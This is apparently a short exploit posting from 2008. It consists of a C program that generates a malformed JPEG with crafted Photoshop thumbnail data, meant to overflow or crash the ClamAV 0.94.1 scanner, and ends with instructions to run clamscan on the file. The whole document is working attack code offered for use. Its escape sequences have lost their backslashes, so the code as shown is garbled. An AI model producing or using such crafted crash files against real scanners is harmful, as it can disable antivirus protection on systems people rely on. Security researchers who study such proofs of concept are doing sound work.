clamav0941-overflow.txt
Posted on 04 December 2008
const char crashstr[] = "xffxd8" // jpg marker "xffxed" // exif data "x00x02" // length "Photoshop 3.0x00" "8BIM" "x04x0c" // thumbnail id "x00" "x01" "x01x01x01x01" "0123456789012345678912345678"; // skip over 28 bytes #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #define NR_ITER 200000 int main() { FILE *fp; int i; fp = fopen("clamav-jpeg-crash.jpg", "w+"); if (!fp) { printf("can't open/create file "); exit(0); } for (i = 0; i < NR_ITER; i++) { fwrite(crashstr, sizeof(crashstr)-1/*don't want 0-byte ?*/, 1, fp); } fclose(fp); printf("done, now run clamscan on ./clamav-jpeg-crash.jpg "); exit(0); }
